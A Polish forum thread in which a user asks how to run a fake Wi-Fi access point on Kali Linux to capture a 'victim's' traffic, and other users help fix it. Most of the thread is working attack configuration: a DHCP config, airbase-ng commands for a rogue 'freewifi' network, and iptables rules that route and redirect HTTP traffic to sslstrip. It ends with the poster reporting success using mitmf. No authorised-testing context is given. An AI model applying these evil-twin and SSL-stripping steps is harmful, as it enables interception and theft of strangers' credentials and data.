Aktywne Wpisy
Chodtok +442
meltdown +27
Używa ktoś z was jeszcze tzw. dumbphone, czyli klasycznych telefonów z klawiaturą?
#telefony #minimalizm #nostalgia
#telefony #minimalizm #nostalgia
źródło: Nokia-6310-Unboxing-and-Review
Pobierz
Aktywne Znaleziska
Witam wszystkich. Poszukuję speca, który będzie potrafił rozwiązać mój problem lub wskaże forum w sieci gdzie takią pomoc znajdę.
Chcę zrobić fake AP wifi na kalim przez adapter wifi TP-LINK(kali16.2 na vmplayerze) ruch ofiary chciałbym przekierować na kartę wifi hosta(w7), który ma bramę wyjściową na routerze cisco. Problem w tym, że po postawieniu dhcp i uruchomieniu ap, ofiara gdy łączy się z siecią nie ma dostępu do internetu, mimo że IP z DHCP zostaję przydzielone. Zamieszczam konfigurację z komentarzami. Pozdro
--------CONFIG DHCP
nano /etc/dhcp/dhcpd.conf
my dhcpd.conf looks like:
authoritative;
default-lease-time 600;
max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name "freewifi";
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
---------MAKE FAKE AP---------
airmon-ng start wlan0airmon-ng check kill //for avoid issues
airbase-ng -c 11 -e freewifi wlan0mon
-------REDIRECT TRAFFIC AND REDIRECT PORTS TO PREPARE SSLSTRIP USE------
iptables --flushiptables --table nat --flush
iptables --delete-chain
iptables -t nat --delete-chain
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTNG -p udp -j DNAT --to 192.168.0.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ifconfig at0 up
-----START DHCP-----
touch /var/lib/dhcp/dhcpd.leases //here i must touch database file manuallydhcpd -d -f -cf /etc/dhcp/dhcpd.conf
Po drugie masz błędy w iptables - ta regułka nie jest prawidłowa :
iptables -t nat -A PREROUTNG -p udp -j DNAT --to 192.168.0.1
Ona przekieruje całkowicie ruch UDP na 192.168.0.1 - a pytanie czy taki adres jest osiągalny, bo i czy na pewno chcesz cały ruch UDP przekierować a nie chodzi Ci tylko o DNS?
Poza tym
192.168.0.1 to adres gw
Byłbym bardzo wdzięczny gdybyś mógł bardziej przybliżyć jak powinno to wyglądać.
I wyczyść te reguły, bo połowa nie ma sensu, podobnie jak ten routing.
iptables -t filter -F
iptables -t nat -F
iptables -t mangle -F
iptables -t filter -X
iptables -t nat -X
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
ifconfig at0 192.168.1.1 netmask
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables --append FORWARD --in-interface at0 -j ACCEPT
i rozwiązanie konfliktu mode monitora w /etc/NetworkManager/NetworkManager.conf
ofiara ma już internet, a w wiresharku zaczęły pojawiać się pakiety z at0.
Wiesz może jak dobrze przekierować żeby sslstip mi to rozbierał?
Swoją drogą gdzie znajdę materiały z konfiguracji sieci w terminalu linuksa?
Pozdrawiam i dzięki za pomoc
Jak chcesz cos przekierowac na inny adres docelowy czy port to dodajesz regułkę DNAT albo REDIRECT w łańcuchu prerouting, np.
iptables -t nat -A PREROUTING -p tcp -s 192.168.1.0/24 --dport 80 -j REDIRECT --to-port 33333
iptables -t nat -A PREROUTING -p tcp -s 192.168.1.0/24 --dport 80 -j DNAT --to-destination 192.168.1.1:33333
Z materiałow to masz zawsze manuale poleceń i dokumentacje, no i gógla trzeba pytać jak się coś nie wie.
Wszystko działa wystarczyło uruchomić DHCP z innymi parametrami a zamiast sslstripa uruchomić mitmf-a. Wydaję mi się że nie wiecie o co do końca mi chodziło...